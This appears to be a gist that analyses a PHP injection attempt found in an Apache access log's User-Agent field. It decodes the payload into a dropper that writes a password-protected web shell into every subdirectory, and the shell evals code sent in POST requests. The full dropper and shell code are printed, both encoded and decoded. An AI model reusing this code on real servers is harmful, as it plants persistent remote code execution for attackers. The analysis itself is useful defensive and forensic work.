@fthomas
Last active December 14, 2015 07:19
<?php eval(base64_decode User-Agent...
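From /var/log/apache2/access.log. The last quoted field of the entry is the client-supplied User-Agent header, which here holds PHP code instead of a browser string. Nothing in this entry shows that the code ran; it would execute only if something on the server later evaluated the logged header as PHP: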
46.105.114.130 - - [27/Feb/2013:18:27:52 +0100] "GET / HTTP/1.1" 200 772 "" "<?php eval(base64_decode(\"YWRkTG9hZGVyKCk7DQokZGF0YSA9IEBvcGVuZGlyKCcuJyk7DQoNCndoaWxlICgkZmlsZSA9IEByZWFkZGlyKCRkYXRhKSkNCnsNCgkkZmlsZSA9IHRyaW0oJGZpbGUpOw0KCWlmICghJGZpbGUgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRmaWxlKSB8fCAhaXNfZGlyKCRmaWxlKSkgY29udGludWU7DQoJYWRkTG9hZGVyKCRmaWxlKTsNCn0NCg0KQGNsb3NlZGlyKCRkYXRhKTsNCg0KZnVuY3Rpb24gYWRkTG9hZGVyKCRkaXIgPSAnJykNCnsNCiAgICBpZiAoJGRpcikgJGRpciAuPSAnLyc7DQogICAgQGNobW9kKCRkaXIsIDc3Nyk7DQogICAgDQogICAgJGZwID0gZm9wZW4oInskZGlyfThkOTQ2YmY5NGY1YTU2MDY0NmNmNzdmYjYwOTg4MWQ0LnBocCIsICJ3Iik7IA0KICAgIGZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ2cwS1FHbHVhVjl6WlhRb0oyRnNiRzkzWDNWeWJGOW1iM0JsYmljc0lERXBPdzBLUUdsdWFWOXpaWFFvSjJSbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUW5MQ0EyTUNrN0RRcEFhVzVwWDNObGRDZ25iV0Y0WDJWNFpXTjFkR2x2Ymw5MGFXMWxKeXdnTmpBcE93MEtRSE5sZEY5MGFXMWxYMnhwYldsMEtEWXdLVHNOQ2cwS0pHUmhkR0VnUFNCQWRXNXpaWEpwWVd4cGVtVW9ZbUZ6WlRZMFgyUmxZMjlrWlNoMGNtbHRLRUFrWDFCUFUxUmJKMlJoZEdFblhTa3BLVHNOQ2cwS2FXWWdLRUFoYVhOZllYSnlZWGtvSkdSaGRHRXBJSHg4SUcxa05TZ2taR0YwWVZzbmNHRnpjM2R2Y21RblhTa2dJVDBnSjJRelpHWTBNemxqTTJVMFlqSmpOREU1TWpCa09HVXlOek16TVRFek1qTTJKeWtnWlhocGREc05DbWxtSUNoQUpHUmhkR0ZiSjJOdlpHVW5YU2tnWlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSa1lYUmhXeWRqYjJSbEoxMHBLVHNOQ21sbUlDaEFKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YU2tnY0hKcGJuUWdKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YVHNOQ2cwS1B6ND0nKSk7DQoJZmNsb3NlKCRmcCk7DQoNCglpZiAoZmlsZV9leGlzdHMoInskZGlyfThkOTQ2YmY5NGY1YTU2MDY0NmNmNzdmYjYwOTg4MWQ0LnBocCIpKQ0KCXsNCiAgICAgICAgJGNrID0gIjE4MjM2NDkzNjU4MjAzNTQiOw0KCSAgICBwcmludCAiJGNrOnsqfTokZGlyOnsqfToiOw0KCQlleGl0Ow0KCX0NCn0=\")); ?>"
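base64_decoded (the argument of the outer eval(base64_decode(...)) in the User-Agent, shown as an escaped string; it is a dropper that tries to write 8d946bf94f5a560646cf77fb609881d4.php into the current directory and each of its subdirectories, then prints a marker string) =>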
addLoader();\r\n$data = @opendir(\'.\');\r\n\r\nwhile ($file = @readdir($data))\r\n{\r\n\t$file = trim($file);\r\n\tif (!$file || preg_match(\'/^\\.+$/\', $file) || !is_dir($file)) continue;\r\n\taddLoader($file);\r\n}\r\n\r\n@closedir($data);\r\n\r\nfunction addLoader($dir = \'\')\r\n{\r\n if ($dir) $dir .= \'/\';\r\n @chmod($dir, 777);\r\n \r\n $fp = fopen("{$dir}8d946bf94f5a560646cf77fb609881d4.php", "w"); \r\n fwrite($fp, base64_decode(\'PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=\'));\r\n\tfclose($fp);\r\n\r\n\tif (file_exists("{$dir}8d946bf94f5a560646cf77fb609881d4.php"))\r\n\t{\r\n $ck = "1823649365820354";\r\n\t print "$ck:{*}:$dir:{*}:";\r\n\t\texit;\r\n\t}\r\n}
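base64_decoded (the string the dropper passes to fwrite(), i.e. the contents of the dropped .php file; it unserializes the POST field 'data', compares the md5 of its 'password' entry with a hard-coded hash, and passes its 'code' entry to eval) =>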
<?php\r\n\r\n@ini_set('allow_url_fopen', 1);\r\n@ini_set('default_socket_timeout', 60);\r\n@ini_set('max_execution_time', 60);\r\n@set_time_limit(60);\r\n\r\n$data = @unserialize(base64_decode(trim(@$_POST['data'])));\r\n\r\nif (@!is_array($data) || md5($data['password']) != 'd3df439c3e4b2c41920d8e2733113236') exit;\r\nif (@$data['code']) eval(base64_decode($data['code']));\r\nif (@$data['check_code']) print $data['check_code'];\r\n\r\n?>